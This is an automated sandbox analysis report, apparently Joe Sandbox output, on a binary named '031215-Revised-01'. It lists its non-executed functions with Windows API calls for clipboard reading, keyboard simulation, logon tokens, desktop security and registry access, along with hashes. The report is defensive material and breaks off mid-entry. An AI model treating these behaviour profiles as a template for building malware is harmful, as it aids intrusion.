                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: 1d31e983dcde7280e6c6dbfe17bbc881d9be77c09f0ff9c824718a33a71bfcd2
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: A3E0E67494010EEFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2281D6319D508A72

                                        Non-executed Functions

                                        Function 00109576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0010961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0010965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0010969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001096C9
                                        • SendMessageW.USER32 ref: 001096F2
                                        • GetKeyState.USER32(00000011), ref: 0010978B
                                        • GetKeyState.USER32(00000009), ref: 00109798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001097AE
                                        • GetKeyState.USER32(00000010), ref: 001097B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001097E9
                                        • SendMessageW.USER32 ref: 00109810
                                        • SendMessageW.USER32(?,00001030,?,00107E95), ref: 00109918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0010992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00109941
                                        • SetCapture.USER32(?), ref: 0010994A
                                        • ClientToScreen.USER32(?,?), ref: 001099AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001099BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001099D6
                                        • ReleaseCapture.USER32 ref: 001099E1
                                        • GetCursorPos.USER32(?), ref: 00109A19
                                        • ScreenToClient.USER32(?,?), ref: 00109A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00109A80
                                        • SendMessageW.USER32 ref: 00109AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00109AEB
                                        • SendMessageW.USER32 ref: 00109B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00109B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00109B4A
                                        • GetCursorPos.USER32(?), ref: 00109B68
                                        • ScreenToClient.USER32(?,?), ref: 00109B75
                                        • GetParent.USER32(?), ref: 00109B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00109BFA
                                        • SendMessageW.USER32 ref: 00109C2B
                                        • ClientToScreen.USER32(?,?), ref: 00109C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00109CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00109CDE
                                        • SendMessageW.USER32 ref: 00109D01
                                        • ClientToScreen.USER32(?,?), ref: 00109D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00109D82
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00109E05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3429851547-4164748364
                                        • Opcode ID: da737a203d48fe7e4995d50317ba9650ea9209601e0562363a871857e38c225e
                                        • Instruction ID: 341071ed9187ef95c116ffc2dbaf1e536fde14767ec9fe03351c8a64ac2b2c47
                                        • Opcode Fuzzy Hash: da737a203d48fe7e4995d50317ba9650ea9209601e0562363a871857e38c225e
                                        • Instruction Fuzzy Hash: 5042AE75608201AFD724CF24CC64AAABBE5FF49314F144619F6D9876E2D7B2E890CF81
                                        Function 00104873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001048F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00104908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00104927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0010494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0010495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0010497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001049AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001049D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00104A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00104A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00104A7E
                                        • IsMenu.USER32(?), ref: 00104A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00104AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00104B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00104B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00104BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00104C82
                                        • wsprintfW.USER32 ref: 00104CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00104CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00104CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00104D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00104D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00104D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 4054740463-328681919
                                        • Opcode ID: 6f665931b2d327691f7eff92df5e37844fab10f3fdf2ed93f4bcd1f971155fe3
                                        • Instruction ID: a3e521a7f6fe22708324968651facefccedc23e93cf0e30932bbe7c5bfb0f915
                                        • Opcode Fuzzy Hash: 6f665931b2d327691f7eff92df5e37844fab10f3fdf2ed93f4bcd1f971155fe3
                                        • Instruction Fuzzy Hash: 1612C1B1600215ABEB249F68CC89FEE7BB8FF45710F104229F695DB2E1DBB49941CB50
                                        Function 0008F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0008F998
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000CF474
                                        • IsIconic.USER32(00000000), ref: 000CF47D
                                        • ShowWindow.USER32(00000000,00000009), ref: 000CF48A
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF494
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4AA
                                        • GetCurrentThreadId.KERNEL32 ref: 000CF4B1
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000CF4BD
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4CE
                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 000CF4D6
                                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 000CF4DE
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF4E1
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF4F6
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF501
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF50B
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF510
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF519
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF51E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000CF528
                                        • keybd_event.USER32(00000012,00000000), ref: 000CF52D
                                        • SetForegroundWindow.USER32(00000000), ref: 000CF530
                                        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 000CF557
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: 58ac5f7b9c48de4d3657cbc1d2f10552dcc3b72fd020c7cf6107dc01ed7bf6d5
                                        • Instruction ID: 48235b689c715e16b59526cd5d3ae1417bc90e68dbe19893c0f394b7b92c5837
                                        • Opcode Fuzzy Hash: 58ac5f7b9c48de4d3657cbc1d2f10552dcc3b72fd020c7cf6107dc01ed7bf6d5
                                        • Instruction Fuzzy Hash: 51315E71B40218BBEB206BB55C4AFBF7EADEB44B50F10012AFB40E61D1C6F15D40AEA1
                                        Function 000D1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                          • Part of subcall function 000D16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                          • Part of subcall function 000D16C3: GetLastError.KERNEL32 ref: 000D174A
                                        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 000D1286
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000D12A8
                                        • CloseHandle.KERNEL32(?), ref: 000D12B9
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000D12D1
                                        • GetProcessWindowStation.USER32 ref: 000D12EA
                                        • SetProcessWindowStation.USER32(00000000), ref: 000D12F4
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 000D1310
                                          • Part of subcall function 000D10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000D11FC), ref: 000D10D4
                                          • Part of subcall function 000D10BF: CloseHandle.KERNEL32(?,?,000D11FC), ref: 000D10E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                        • String ID: $default$winsta0
                                        • API String ID: 22674027-1027155976
                                        • Opcode ID: 9b9a29656ed1b1ed91b5ced66e4371b809c9a8c09de74bf503d8f2a977526dce
                                        • Instruction ID: 592216ce1a2079d7808628847c3b068c9766408f027f08fb5d1dfd24ca767648
                                        • Opcode Fuzzy Hash: 9b9a29656ed1b1ed91b5ced66e4371b809c9a8c09de74bf503d8f2a977526dce
                                        • Instruction Fuzzy Hash: 67816D71900309BBDF219FA4DC49FEE7BB9EF08704F14412AF911A62A1DBB18995CF61
                                        Function 000D0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                          • Part of subcall function 000D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                          • Part of subcall function 000D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                          • Part of subcall function 000D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000D0BCC
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000D0C00
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0C17
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000D0C51
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000D0C6D
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0C84
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000D0C8C
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D0C93
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000D0CB4
                                        • CopySid.ADVAPI32(00000000), ref: 000D0CBB
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000D0CEA
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000D0D0C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000D0D1E
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D45
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D4C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D55
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D5C
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0D65
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D6C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D0D78
                                        • HeapFree.KERNEL32(00000000), ref: 000D0D7F
                                          • Part of subcall function 000D1193: GetProcessHeap.KERNEL32(00000008,000D0BB1,?,00000000,?,000D0BB1,?), ref: 000D11A1
                                          • Part of subcall function 000D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000D0BB1,?), ref: 000D11A8
                                          • Part of subcall function 000D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000D0BB1,?), ref: 000D11B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: c339af6b90ab8f3884ae3dba7a42f8244379e45e4ce9e346e6ea9cb39b94aed8
                                        • Instruction ID: 85aac158a79e674799858b709baad6d55624594bf0a63f06b97866d242e0b4d3
                                        • Opcode Fuzzy Hash: c339af6b90ab8f3884ae3dba7a42f8244379e45e4ce9e346e6ea9cb39b94aed8
                                        • Instruction Fuzzy Hash: 55714A7690020AABDF509FA4DC48BEEBBB9BF05300F144616F958A7291D7B1A945CFB0
                                        Function 000EEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32(0010CC08), ref: 000EEB29
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 000EEB37
                                        • GetClipboardData.USER32(0000000D), ref: 000EEB43
                                        • CloseClipboard.USER32 ref: 000EEB4F
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEB87
                                        • CloseClipboard.USER32 ref: 000EEB91
                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 000EEBBC
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 000EEBC9
                                        • GetClipboardData.USER32(00000001), ref: 000EEBD1
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEBE2
                                        • GlobalUnlock.KERNEL32(00000000,?), ref: 000EEC22
                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 000EEC38
                                        • GetClipboardData.USER32(0000000F), ref: 000EEC44
                                        • GlobalLock.KERNEL32(00000000), ref: 000EEC55
                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000EEC77
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000EEC94
                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000EECD2
                                        • GlobalUnlock.KERNEL32(00000000,?,?), ref: 000EECF3
                                        • CountClipboardFormats.USER32 ref: 000EED14
                                        • CloseClipboard.USER32 ref: 000EED59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                        • String ID:
                                        • API String ID: 420908878-0
                                        • Opcode ID: 8b398be0754b9bf963c9644e147ef14ef83e270baa91622f4d94433597883614
                                        • Instruction ID: d532a1e56ac16925500847aae04527de58cb6b081cd02a36af15c97a0fa4ebc0
                                        • Opcode Fuzzy Hash: 8b398be0754b9bf963c9644e147ef14ef83e270baa91622f4d94433597883614
                                        • Instruction Fuzzy Hash: C361F0342042859FD310EF25D884F6AB7E4AF84704F148619F49AA76A2DB71DD86CFA2
                                        Function 000E698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000E69BE
                                        • FindClose.KERNEL32(00000000), ref: 000E6A12
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000E6A4E
                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000E6A75
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E6AB2
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 000E6ADF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                        • API String ID: 3830820486-3289030164
                                        • Opcode ID: c7e709946a1180b829edddd799ecce86f5f950a5c77971a794db317bf02d5695
                                        • Instruction ID: 21da3ec3c6802f58b55bc8cd4def28cd21001fb64cb79005efc9e55c19b9eb97
                                        • Opcode Fuzzy Hash: c7e709946a1180b829edddd799ecce86f5f950a5c77971a794db317bf02d5695
                                        • Instruction Fuzzy Hash: DBD15271908340AEC710EB64D882EAFB7ECBF98704F44491DF589D7192EB79DA44CB62
                                        Function 000E9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000E9663
                                        • GetFileAttributesW.KERNEL32(?), ref: 000E96A1
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 000E96BB
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E96D3
                                        • FindClose.KERNEL32(00000000), ref: 000E96DE
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000E96FA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E974A
                                        • SetCurrentDirectoryW.KERNEL32(00136B7C), ref: 000E9768
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000E9772
                                        • FindClose.KERNEL32(00000000), ref: 000E977F
                                        • FindClose.KERNEL32(00000000), ref: 000E978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: fa38e03025518202e500249f885f2f4ff9722444b8b8b3c70d6267b3296df259
                                        • Instruction ID: be62db34bd235717b1ac21749b548852d715079cc01b757d123701e98e21e19d
                                        • Opcode Fuzzy Hash: fa38e03025518202e500249f885f2f4ff9722444b8b8b3c70d6267b3296df259
                                        • Instruction Fuzzy Hash: 8C31F3326002597EDF24AFB6DC08ADE77ECAF09321F144166F884F2091DB74DD848E50
                                        Function 000E979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 000E97BE
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000E9819
                                        • FindClose.KERNEL32(00000000), ref: 000E9824
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 000E9840
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E9890
                                        • SetCurrentDirectoryW.KERNEL32(00136B7C), ref: 000E98AE
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000E98B8
                                        • FindClose.KERNEL32(00000000), ref: 000E98C5
                                        • FindClose.KERNEL32(00000000), ref: 000E98D5
                                          • Part of subcall function 000DDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 000DDB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 725aff71902fddf23cc4eb5f06f3ace7149650364359c35d54d099b0d9054b2a
                                        • Instruction ID: ab1320fae699fdc4c5d513a197180ab923fd39621a45dadd90aecb8108b29f94
                                        • Opcode Fuzzy Hash: 725aff71902fddf23cc4eb5f06f3ace7149650364359c35d54d099b0d9054b2a
                                        • Instruction Fuzzy Hash: 1031C1316002596EDF20AFB6ED48ADEB7ACAF06320F148155F890B21E1DF74DE858F60
                                        Function 000FBE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBF3E
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 000FBFA9
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBFCD
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000FC02C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000FC0E7
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC154
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC1E9
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 000FC23A
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 000FC2E3
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000FC382
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FC38F
                                        Memory Dump Source
